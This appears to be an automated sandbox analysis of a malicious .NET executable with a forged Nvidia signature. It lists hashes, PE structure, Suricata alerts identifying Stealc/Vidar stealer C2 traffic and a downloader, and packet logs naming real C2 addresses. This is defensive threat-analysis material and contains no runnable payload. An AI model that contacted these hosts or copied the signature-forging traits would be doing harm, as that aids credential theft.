                                                                                                                          SHA-256:6CF354D8C07B353870741C6C53F467743E214B4D170E92316D566B555268A44B
                                                                                                                          SHA-512:9460135D568807652689189CF3FE8C8B641C0E3B7582F6F9DC35EEFC36B82312FCDC9C08F841024717F62F23160B2CDB6AC3B1EB3188029656A7913114D354C2
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............................S................s...........4.......4......4...........4.....4.....Rich...........PE..L......f...........!...&.....................................................P............@.............................x.......<............................0......P...................................@...............P............................text............................... ..`.rdata...k.......l..................@..@.data...............................@....reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                          File Type:MS Windows registry file, NT/2000 or above
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1835008
                                                                                                                          Entropy (8bit):4.4139407417976715
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6144:Icifpi6ceLPL9skLmb0moSWSPtaJG8nAgex285i2MMhA20X4WABlGuNb5+:9i58oSWIZBk2MM6AFBZo
                                                                                                                          MD5:61B9DC452FE2F4E269CB400E00323748
                                                                                                                          SHA1:025DCC6464006A43A5B09981ABE840F4A95213B0
                                                                                                                          SHA-256:5E97FAC7CEB08C82014762EF97CEAD28A48CD14813CA0E55CDDD6A8F09F9DF07
                                                                                                                          SHA-512:996EB6557A47886593EC26D7AC8787D66949176B2B2C3DA86AB0F87E97FC551F5E7542E1309CD4CC3B703946E86E38F0AB0C39318BA2AB2F56FCC4033CCE2C18
                                                                                                                          Malicious:false
                                                                                                                          Preview:regfE...E....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.c.e3..................................................................................................................................................................................................................................................................................................................................................Q........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          Static File Info

                                                                                                                          General

                                                                                                                          File type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Entropy (8bit):7.888057525301734
                                                                                                                          TrID:
                                                                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                                                          • Win32 Executable (generic) a (10002005/4) 49.96%
                                                                                                                          • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                          • DOS Executable Generic (2002/1) 0.01%
                                                                                                                          File name:file.exe
                                                                                                                          File size:405'544 bytes
                                                                                                                          MD5:cc94be13bc24599e326d03ca246a61fa
                                                                                                                          SHA1:73ed54a021153213ee4823683e4a9376b479d939
                                                                                                                          SHA256:41ee1357282ed8722ff127ac17ff0831a92a54e72c32a560abeae0d27f5c090e
                                                                                                                          SHA512:b2da25e014462b410d8a68dfd09c0159772271b7f706c95ab2ef517060dd5305a02b49ac021a80d9c21624c8c02bdde9b62be9dcbace2308802edcc3a336b125
                                                                                                                          SSDEEP:6144:bXqwxGuBem9P3ofEPGc8V8vkl4vn6QdG9eB4RyWTkui4ZR6d0psZ8EZ:bXqGGTvNUw435B4pZR6d0psaEZ
                                                                                                                          TLSH:7884CF9C766072DFC857C472DEA86C68EA6078BA530F4607A06752EDDE4D897CF180F2
                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.....................\............... ....@.. ....................................@................................

                                                                                                                          File Icon

                                                                                                                          Icon Hash:00928e8e8686b000

                                                                                                                          Static PE Info

                                                                                                                          General

                                                                                                                          Entrypoint:0x46800a
                                                                                                                          Entrypoint Section:
                                                                                                                          Digitally signed:true
                                                                                                                          Imagebase:0x400000
                                                                                                                          Subsystem:windows cui
                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                          Time Stamp:0x66FDF1E0 [Thu Oct 3 01:22:40 2024 UTC]
                                                                                                                          TLS Callbacks:
                                                                                                                          CLR (.Net) Version:
                                                                                                                          OS Version Major:4
                                                                                                                          OS Version Minor:0
                                                                                                                          File Version Major:4
                                                                                                                          File Version Minor:0
                                                                                                                          Subsystem Version Major:4
                                                                                                                          Subsystem Version Minor:0
                                                                                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                          Authenticode Signature

                                                                                                                          Signature Valid:false
                                                                                                                          Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                                                                          Signature Validation Error:The digital signature of the object did not verify
                                                                                                                          Error Number:-2146869232
                                                                                                                          Not Before, Not After
                                                                                                                          • 26/02/2022 01:00:00 02/03/2023 00:59:59
                                                                                                                          Subject Chain
                                                                                                                          • CN=Nvidia Corporation, OU=IT-MIS, O=Nvidia Corporation, L=Santa Clara, S=California, C=US
                                                                                                                          Version:3
                                                                                                                          Thumbprint MD5:1CCB73FCDB6A7BE7C04978F53E40695A
                                                                                                                          Thumbprint SHA-1:CA0F1595C0C349C003D41743460E448E887F9477
                                                                                                                          Thumbprint SHA-256:1E56D8CFAE4119883632D8FD6E1E3ACDF16CDDAB9621FCA4D6CFFB1A663E74D1
                                                                                                                          Serial:0800EE4ED1A959CC9887E905AD662BFE

                                                                                                                          Entrypoint Preview

                                                                                                                          Instruction
                                                                                                                          jmp dword ptr [00468000h]
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al

                                                                                                                          Data Directories

                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x587500x4b.text
                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x640000x728.rsrc
                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x60a000x2628
                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x660000xc.reloc
                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x680000x8
                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x580000x48.text
                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                          Sections

                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                          25W~Dos0x20000x550280x552000f8207d5bb48109fc08199d046b6375aFalse1.0003326908957415data7.999495427642678IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                          .text0x580000xa7a00xa80051f2e6193403c30474940064b0912069False0.38757905505952384data4.7274769501515355IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                          .rsrc0x640000x7280x800b884fb10c9d86f2f0996c4bd8682dad7False0.3916015625data3.825424770100372IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                          .reloc0x660000xc0x200354e5ffc7f8a670c981da5a85608e4ceFalse0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                          0x680000x100x2009dcbd1f73890007ff6899f2f1fba13acFalse0.044921875data0.13872951814887827IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

                                                                                                                          Resources

                                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                          RT_VERSION0x640a00x498OpenPGP Public Key0.4226190476190476
                                                                                                                          RT_MANIFEST0x645380x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041

                                                                                                                          Imports

                                                                                                                          DLLImport
                                                                                                                          mscoree.dll_CorExeMain

                                                                                                                          Network Behavior

                                                                                                                          Suricata IDS Alerts

                                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                          2024-10-03T03:26:43.493413+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.75794749.12.197.9443TCP
                                                                                                                          2024-10-03T03:26:44.657800+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.75794849.12.197.9443TCP
                                                                                                                          2024-10-03T03:26:46.021316+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.75794949.12.197.9443TCP
                                                                                                                          2024-10-03T03:26:46.730519+02002049087ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST1192.168.2.75794949.12.197.9443TCP
                                                                                                                          2024-10-03T03:26:47.472469+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.75795049.12.197.9443TCP
                                                                                                                          2024-10-03T03:26:48.172762+02002044247ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config149.12.197.9443192.168.2.757950TCP
                                                                                                                          2024-10-03T03:26:48.838450+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.75795149.12.197.9443TCP
                                                                                                                          2024-10-03T03:26:49.661070+02002051831ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1149.12.197.9443192.168.2.757951TCP
                                                                                                                          2024-10-03T03:26:50.433191+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.75795249.12.197.9443TCP
                                                                                                                          2024-10-03T03:26:51.659845+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.75795349.12.197.9443TCP
                                                                                                                          2024-10-03T03:26:54.683434+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.75795449.12.197.9443TCP
                                                                                                                          2024-10-03T03:26:55.767673+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.75795549.12.197.9443TCP
                                                                                                                          2024-10-03T03:26:57.026967+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.75795649.12.197.9443TCP
                                                                                                                          2024-10-03T03:26:58.473481+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.75795749.12.197.9443TCP
                                                                                                                          2024-10-03T03:27:00.540687+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.75795849.12.197.9443TCP
                                                                                                                          2024-10-03T03:27:02.447080+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.75795949.12.197.9443TCP
                                                                                                                          2024-10-03T03:27:04.221912+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.75796049.12.197.9443TCP
                                                                                                                          2024-10-03T03:27:05.898986+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.75796149.12.197.9443TCP
                                                                                                                          2024-10-03T03:27:07.438246+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.75796249.12.197.9443TCP
                                                                                                                          2024-10-03T03:27:10.650406+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.75796349.12.197.9443TCP
                                                                                                                          2024-10-03T03:27:12.316186+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.75796449.12.197.9443TCP
                                                                                                                          2024-10-03T03:27:13.692925+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.75796549.12.197.9443TCP
                                                                                                                          2024-10-03T03:27:15.636741+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.75796649.12.197.9443TCP
                                                                                                                          2024-10-03T03:27:17.744774+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.75796849.12.197.9443TCP
                                                                                                                          2024-10-03T03:27:20.454725+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.75796949.12.197.9443TCP
                                                                                                                          2024-10-03T03:27:22.257645+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.757970147.45.44.10480TCP

                                                                                                                          Network Port Distribution

                                                                                                                          TCP Packets

                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                          Oct 3, 2024 03:26:41.150830030 CEST57946443192.168.2.7104.102.49.254
                                                                                                                          Oct 3, 2024 03:26:41.150868893 CEST44357946104.102.49.254192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:41.150973082 CEST57946443192.168.2.7104.102.49.254
                                                                                                                          Oct 3, 2024 03:26:41.200292110 CEST57946443192.168.2.7104.102.49.254
                                                                                                                          Oct 3, 2024 03:26:41.200330019 CEST44357946104.102.49.254192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:41.842164993 CEST44357946104.102.49.254192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:41.842417002 CEST57946443192.168.2.7104.102.49.254
                                                                                                                          Oct 3, 2024 03:26:41.905803919 CEST57946443192.168.2.7104.102.49.254
                                                                                                                          Oct 3, 2024 03:26:41.905848026 CEST44357946104.102.49.254192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:41.906176090 CEST44357946104.102.49.254192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:41.908597946 CEST57946443192.168.2.7104.102.49.254
                                                                                                                          Oct 3, 2024 03:26:42.010054111 CEST57946443192.168.2.7104.102.49.254
                                                                                                                          Oct 3, 2024 03:26:42.051404953 CEST44357946104.102.49.254192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:42.458584070 CEST44357946104.102.49.254192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:42.458610058 CEST44357946104.102.49.254192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:42.458623886 CEST44357946104.102.49.254192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:42.458673000 CEST57946443192.168.2.7104.102.49.254
                                                                                                                          Oct 3, 2024 03:26:42.458734035 CEST44357946104.102.49.254192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:42.458774090 CEST57946443192.168.2.7104.102.49.254
                                                                                                                          Oct 3, 2024 03:26:42.458798885 CEST57946443192.168.2.7104.102.49.254
                                                                                                                          Oct 3, 2024 03:26:42.562767029 CEST44357946104.102.49.254192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:42.562791109 CEST44357946104.102.49.254192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:42.562946081 CEST57946443192.168.2.7104.102.49.254
                                                                                                                          Oct 3, 2024 03:26:42.562946081 CEST57946443192.168.2.7104.102.49.254
                                                                                                                          Oct 3, 2024 03:26:42.562980890 CEST44357946104.102.49.254192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:42.564546108 CEST57946443192.168.2.7104.102.49.254
                                                                                                                          Oct 3, 2024 03:26:42.568511009 CEST44357946104.102.49.254192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:42.568577051 CEST57946443192.168.2.7104.102.49.254
                                                                                                                          Oct 3, 2024 03:26:42.568593979 CEST44357946104.102.49.254192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:42.568618059 CEST44357946104.102.49.254192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:42.568666935 CEST57946443192.168.2.7104.102.49.254
                                                                                                                          Oct 3, 2024 03:26:42.568979025 CEST57946443192.168.2.7104.102.49.254
                                                                                                                          Oct 3, 2024 03:26:42.569025040 CEST44357946104.102.49.254192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:42.630548954 CEST57947443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:42.630598068 CEST4435794749.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:42.630892038 CEST57947443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:42.631015062 CEST57947443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:42.631031990 CEST4435794749.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:43.493030071 CEST4435794749.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:43.493412971 CEST57947443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:43.499249935 CEST57947443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:43.499262094 CEST4435794749.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:43.499506950 CEST4435794749.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:43.499667883 CEST57947443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:43.500063896 CEST57947443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:43.547403097 CEST4435794749.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:43.984858990 CEST4435794749.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:43.984945059 CEST4435794749.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:43.984992981 CEST57947443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:43.985029936 CEST57947443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:43.988301039 CEST57947443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:43.988317966 CEST4435794749.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:43.999888897 CEST57948443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:43.999932051 CEST4435794849.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:44.000004053 CEST57948443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:44.000200033 CEST57948443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:44.000212908 CEST4435794849.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:44.657723904 CEST4435794849.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:44.657799959 CEST57948443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:44.658468008 CEST57948443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:44.658474922 CEST4435794849.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:44.660161972 CEST57948443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:44.660166979 CEST4435794849.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:45.360076904 CEST4435794849.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:45.360137939 CEST57948443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:45.360152960 CEST4435794849.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:45.360204935 CEST57948443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:45.360245943 CEST4435794849.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:45.360284090 CEST57948443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:45.360318899 CEST4435794849.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:45.360358000 CEST57948443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:45.360377073 CEST57948443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:45.360389948 CEST4435794849.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:45.375839949 CEST57949443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:45.375966072 CEST4435794949.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:45.376055002 CEST57949443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:45.376321077 CEST57949443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:45.376363039 CEST4435794949.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:46.021198034 CEST4435794949.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:46.021316051 CEST57949443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:46.021871090 CEST57949443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:46.021902084 CEST4435794949.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:46.024055958 CEST57949443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:46.024070024 CEST4435794949.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:46.730447054 CEST4435794949.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:46.730468988 CEST4435794949.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:46.730544090 CEST4435794949.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:46.730808973 CEST57949443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:46.731297970 CEST57949443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:46.731373072 CEST4435794949.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:46.747987986 CEST57950443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:46.748119116 CEST4435795049.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:46.748225927 CEST57950443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:46.748564005 CEST57950443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:46.748651981 CEST4435795049.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:47.472363949 CEST4435795049.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:47.472469091 CEST57950443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:47.472984076 CEST57950443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:47.473012924 CEST4435795049.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:47.474725962 CEST57950443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:47.474741936 CEST4435795049.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:48.172523022 CEST4435795049.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:48.172549963 CEST4435795049.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:48.172620058 CEST57950443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:48.172636032 CEST4435795049.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:48.172688961 CEST57950443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:48.172735929 CEST57950443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:48.177201986 CEST57950443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:48.177248955 CEST4435795049.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:48.192889929 CEST57951443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:48.192929029 CEST4435795149.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:48.192996979 CEST57951443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:48.193175077 CEST57951443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:48.193192005 CEST4435795149.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:48.838320017 CEST4435795149.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:48.838449955 CEST57951443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:48.986489058 CEST57951443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:48.986502886 CEST4435795149.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:49.015660048 CEST57951443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:49.015671015 CEST4435795149.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:49.660872936 CEST4435795149.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:49.660944939 CEST57951443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:49.660960913 CEST4435795149.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:49.661001921 CEST57951443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:49.661216021 CEST57951443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:49.661237955 CEST4435795149.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:49.750533104 CEST57952443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:49.750587940 CEST4435795249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:49.750653982 CEST57952443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:49.750930071 CEST57952443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:49.750946045 CEST4435795249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:50.433106899 CEST4435795249.12.197.9192.168.2.7
